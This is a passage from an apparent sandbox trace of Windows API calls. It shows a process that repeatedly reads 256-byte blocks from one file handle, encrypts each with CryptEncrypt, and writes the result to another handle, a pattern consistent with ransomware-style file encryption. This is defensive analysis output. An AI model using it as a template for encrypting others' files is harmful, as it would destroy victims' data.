lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.275] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.275] GetLastError () returned 0x0 [0151.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.275] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.275] GetLastError () returned 0x0 [0151.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.275] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.275] GetLastError () returned 0x0 [0151.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.276] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.276] GetLastError () returned 0x0 [0151.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.276] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.276] GetLastError () returned 0x0 [0151.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.276] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.276] GetLastError () returned 0x0 [0151.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.276] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.276] GetLastError () returned 0x0 [0151.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.276] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.276] GetLastError () returned 0x0 [0151.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.276] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.276] GetLastError () returned 0x0 [0151.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.276] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.276] GetLastError () returned 0x0 [0151.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.277] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.277] GetLastError () returned 0x0 [0151.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.277] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.277] GetLastError () returned 0x0 [0151.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.277] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.277] GetLastError () returned 0x0 [0151.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.277] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.277] GetLastError () returned 0x0 [0151.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.277] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.277] GetLastError () returned 0x0 [0151.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.277] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.277] GetLastError () returned 0x0 [0151.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.278] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.278] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.278] GetLastError () returned 0x0 [0151.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.278] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.278] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.278] GetLastError () returned 0x0 [0151.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.278] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.278] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.278] GetLastError () returned 0x0 [0151.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.278] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.278] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.278] GetLastError () returned 0x0 [0151.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.278] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.278] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.278] GetLastError () returned 0x0 [0151.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.278] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.278] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.278] GetLastError () returned 0x0 [0151.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.278] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.279] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.279] GetLastError () returned 0x0 [0151.279] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.279] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.279] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.279] GetLastError () returned 0x0 [0151.279] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.279] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.279] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.279] GetLastError () returned 0x0 [0151.279] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.279] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.279] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.279] GetLastError () returned 0x0 [0151.279] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.279] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.280] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.280] GetLastError () returned 0x0 [0151.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.280] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.280] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.280] GetLastError () returned 0x0 [0151.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.280] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.280] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.280] GetLastError () returned 0x0 [0151.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.280] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.280] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.280] GetLastError () returned 0x0 [0151.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.280] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.280] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.280] GetLastError () returned 0x0 [0151.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.280] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.280] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.280] GetLastError () returned 0x0 [0151.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.280] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.280] CryptEncrypt (in: 